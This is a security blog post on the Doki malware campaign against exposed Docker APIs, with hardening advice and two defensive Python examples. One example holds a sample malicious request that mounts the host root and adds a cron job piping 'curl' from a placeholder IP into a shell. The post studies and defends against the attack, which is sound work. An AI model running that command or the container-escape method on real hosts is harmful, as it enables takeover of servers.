Cybersecurity, Research

Undetectable Linux malware targeting Docker servers with exposed APIs

What is Docker?

Docker is a popular containerization platform for Linux and Windows that lets developers build, test, and run applications in loosely isolated environments called containers. Containers share the host's kernel, so a container that is granted access to host resources (a bind mount of the host filesystem, a privileged flag) can compromise the host itself; that property is what the campaign below relies on.

According to research shared by Intezer, an ongoing campaign by the Ngrok mining botnet scans the Internet for misconfigured Docker API endpoints and has already infected many vulnerable servers with a new piece of malware.

While the Ngrok mining botnet has been active for the past two years, this campaign focuses on taking control of misconfigured Docker servers and using them to spin up malicious containers that run cryptominers on the victims' infrastructure.

Dubbed "Doki," the new multi-threaded malware leverages "an undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way to dynamically generate its C2 domain address, despite samples being publicly available on VirusTotal."

Key Findings

According to researchers, the malware:

  • was designed to execute commands received from its operators;
  • uses a Dogecoin cryptocurrency block explorer to dynamically generate its C2 domain in real time;
  • uses the embedTLS library for cryptographic functions and network communication;
  • creates unique URLs with a short lifespan and uses them to download payloads during the attack.

"The malware uses the DynDNS service and a unique domain generation algorithm (DGA) based on the Dogecoin cryptocurrency blockchain to find its C2 domain in real time."

In addition, the attackers behind this campaign compromise the host machine itself by binding the newly created container to the server's root directory (a bind mount of the host's "/" into the container), which gives them read and write access to every file on the host.

"By using the bind configuration, the attacker can control the host's cron utility. The attacker modifies the host's cron to execute the downloaded payload every minute."

"This attack is very dangerous because the attacker uses container escape techniques to gain full control of the victim's infrastructure."

Once established, the malware also uses the compromised system to scan for other hosts with exposed Redis, Docker, SSH, and HTTP ports, using zmap, zgrab, and jq.

Recent Attacks on Docker Servers

Doki stayed off the radar for more than six months despite having been uploaded to VirusTotal on January 14, 2020, and scanned multiple times since then. Remarkably, at the time of writing, none of the 61 detection engines on VirusTotal flag it.


This is the second campaign against Docker, the most widely used container platform, in a single month. Late last month, malicious actors were found targeting exposed Docker API endpoints and creating malware-laden images to launch DDoS attacks and mine cryptocurrency.

In short, researchers have found a Linux malware that no engine currently detects, that relies on undocumented techniques to stay under the radar, and that targets publicly accessible Docker servers hosted on popular cloud platforms, including AWS, Azure, and Alibaba Cloud.

Users and organizations running Docker are advised not to expose the daemon's API to the Internet at all. If remote access is unavoidable, bind the listener only to a trusted network or VPN interface, require TLS client certificates (the tlsverify option) rather than a plaintext listener on port 2375, and grant access only to users who are trusted to control the daemon, since anyone who can create containers can obtain root on the host.
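The following is an added example for this write-up, not Docker's or the blog's code. It audits a dockerd configuration for the exposed, unauthenticated listener the campaign scans for and builds the hardened equivalent. The dicts use the keys dockerd reads from daemon.json ("hosts", "tls", "tlsverify", "tlscacert", "tlscert", "tlskey"); the sample values, the management address 10.8.0.1 and the certificate paths are assumptions for illustration.

```python
"""Audit a dockerd daemon.json-style configuration for an Internet-exposed,
unauthenticated API listener and build the hardened equivalent.

Added example for this write-up, not Docker's or the blog's code. The sample
configuration, the management IP and the certificate paths are assumptions."""
import json

DEFAULT_SOCKET = "unix:///var/run/docker.sock"
ALL_INTERFACES = ("", "0.0.0.0", "::", "[::]")


def _tcp_listeners(cfg):
    """Yield (host_string, bind_address, port) for each tcp:// entry in hosts.
    When "hosts" is absent dockerd listens on the unix socket only."""
    for h in cfg.get("hosts", [DEFAULT_SOCKET]):
        if h.startswith("tcp://"):
            addr, _, port = h[len("tcp://"):].rpartition(":")
            yield h, addr, port


def audit_daemon_config(cfg):
    """Return a list of findings; an empty list means no TCP exposure issue."""
    findings = []
    for h, addr, port in _tcp_listeners(cfg):
        if addr in ALL_INTERFACES:
            findings.append(f"{h}: bound to all interfaces, reachable from the "
                            "Internet unless firewalled")
        if not cfg.get("tlsverify"):
            if cfg.get("tls"):
                findings.append(f"{h}: tls without tlsverify encrypts but does "
                                "not authenticate clients")
            else:
                findings.append(f"{h}: plaintext API with no authentication; "
                                "any client can create containers")
    return findings


def hardened_daemon_config(cfg, management_ip):
    """Rebuild `cfg` so the API is reachable only on `management_ip` (the VPN or
    management interface address) on the TLS port with mandatory client certs.
    Unrelated keys (log driver, storage options) are carried over unchanged."""
    hardened = {k: v for k, v in cfg.items()
                if k not in ("hosts", "tls", "tlsverify",
                             "tlscacert", "tlscert", "tlskey")}
    hardened["hosts"] = [DEFAULT_SOCKET, f"tcp://{management_ip}:2376"]
    hardened.update({
        "tlsverify": True,                              # require CA-signed client cert
        "tlscacert": "/etc/docker/certs/ca.pem",        # assumed paths
        "tlscert": "/etc/docker/certs/server-cert.pem",
        "tlskey": "/etc/docker/certs/server-key.pem",
    })
    return hardened


# Constructed sample: the misconfiguration the campaign scans for.
WEAK_CONFIG = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
               "log-driver": "json-file"}

if __name__ == "__main__":
    for finding in audit_daemon_config(WEAK_CONFIG):
        print("FINDING:", finding)
    print(json.dumps(hardened_daemon_config(WEAK_CONFIG, "10.8.0.1"), indent=2))
```

Two caveats when applying the hardened configuration. On distributions whose systemd unit already starts dockerd with -H fd://, setting "hosts" in daemon.json makes the daemon refuse to start because the directive is then specified both as a flag and in the file; put the listener in a systemd drop-in override instead. And tlsverify only authenticates clients; the host firewall should still block 2376 from anything but the VPN range, so a leaked client certificate cannot be used from the open Internet.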

If you provision containers on behalf of users through your own web service or API, be even more careful than usual with parameter validation: a caller must not be able to pass crafted parameters (a bind mount of the host filesystem, a privileged flag, an arbitrary image) that cause Docker to create a container of the attacker's choosing. Fix every host-facing setting server-side and let the caller choose only from an allowlist.
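The following pair of functions is an added example for this write-up, not the blog's code, showing the parameter-validation point above: a provisioning endpoint that forwards the caller's HostConfig unchanged, beside a hardened version that fixes every host-facing setting server-side. The incoming request is modelled as a dict and both functions return the body that would be sent to the Engine API's POST /containers/create; no daemon is contacted. The image allowlist, the per-tenant volume root, the resource limits and the sample malicious request are assumptions constructed for illustration.

```python
"""Container-provisioning request handling, vulnerable and hardened.

Added example for this write-up, not the blog's code. Both builders return the
JSON body for POST /containers/create; nothing talks to a daemon. The image
allowlist, volume root, limits and sample request are assumptions."""
import re

ALLOWED_IMAGES = {                              # assumed internal registry
    "registry.example.internal/app:1.4",
    "registry.example.internal/worker:2.0",
}
TENANT_VOLUME_ROOT = "/srv/tenant-data"         # assumed host directory
TENANT_ID = re.compile(r"[a-z0-9][a-z0-9-]{0,31}")


class RejectedRequest(ValueError):
    pass


def build_create_body_unsafe(request):
    """Vulnerable: whatever HostConfig the caller sends is forwarded to the
    daemon, so {"Binds": ["/:/host:rw"]} or {"Privileged": true} gives the
    caller the same host access the attackers above obtained directly."""
    return {
        "Image": request["image"],
        "Cmd": request.get("cmd", []),
        "HostConfig": request.get("host_config", {}),
    }


def build_create_body_safe(request, tenant_id):
    """Hardened: the caller picks only an allowlisted image and a command;
    every host-facing setting is fixed here, never taken from the request."""
    for key in ("host_config", "binds", "privileged", "pid_mode"):
        if key in request:
            raise RejectedRequest(f"client may not supply {key}")
    image = request.get("image")
    if image not in ALLOWED_IMAGES:
        raise RejectedRequest("image is not in the allowlist")
    if not TENANT_ID.fullmatch(tenant_id):
        raise RejectedRequest("malformed tenant id")   # blocks "../" and friends
    cmd = request.get("cmd", [])
    if not isinstance(cmd, list) or not all(isinstance(c, str) for c in cmd):
        raise RejectedRequest("cmd must be a list of strings")
    return {
        "Image": image,
        "Cmd": cmd,
        "HostConfig": {
            # host path derived from the authenticated tenant, not from input
            "Binds": [f"{TENANT_VOLUME_ROOT}/{tenant_id}:/data:rw"],
            "Privileged": False,
            "CapDrop": ["ALL"],
            "SecurityOpt": ["no-new-privileges"],
            "ReadonlyRootfs": True,
            "PidsLimit": 256,
            "Memory": 512 * 1024 * 1024,
        },
    }


def rejection_reason(request, tenant_id):
    """Return the rejection message for a request, or None if it is accepted."""
    try:
        build_create_body_safe(request, tenant_id)
    except RejectedRequest as exc:
        return str(exc)
    return None


# Constructed request: the shape an operator would send through a provisioning
# front end that forwards HostConfig unchanged (198.51.100.7 is a placeholder).
MALICIOUS_REQUEST = {
    "image": "alpine",
    "cmd": ["sh", "-c",
            "echo '* * * * * root curl http://198.51.100.7/p | sh' >> /host/etc/crontab"],
    "host_config": {"Binds": ["/:/host:rw"]},
}

if __name__ == "__main__":
    print("unsafe forwards:", build_create_body_unsafe(MALICIOUS_REQUEST)["HostConfig"])
    print("safe rejects:", rejection_reason(MALICIOUS_REQUEST, "acme"))
```

The hardened builder still lets the caller choose Cmd, which is acceptable only because the container it runs in has no capabilities, a read-only root filesystem and a single tenant-scoped bind; if the front end needs stricter control, Cmd should come from the same allowlist as the image. The tenant id is validated with a full-match pattern before it is interpolated into the host path, which is what keeps a caller from steering the bind to another tenant's directory or to /.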

See Docker's own documentation on security best practices for further hardening guidance.


Undetectable Linux malware targeting Docker servers with exposed APIs — Bothrops Blog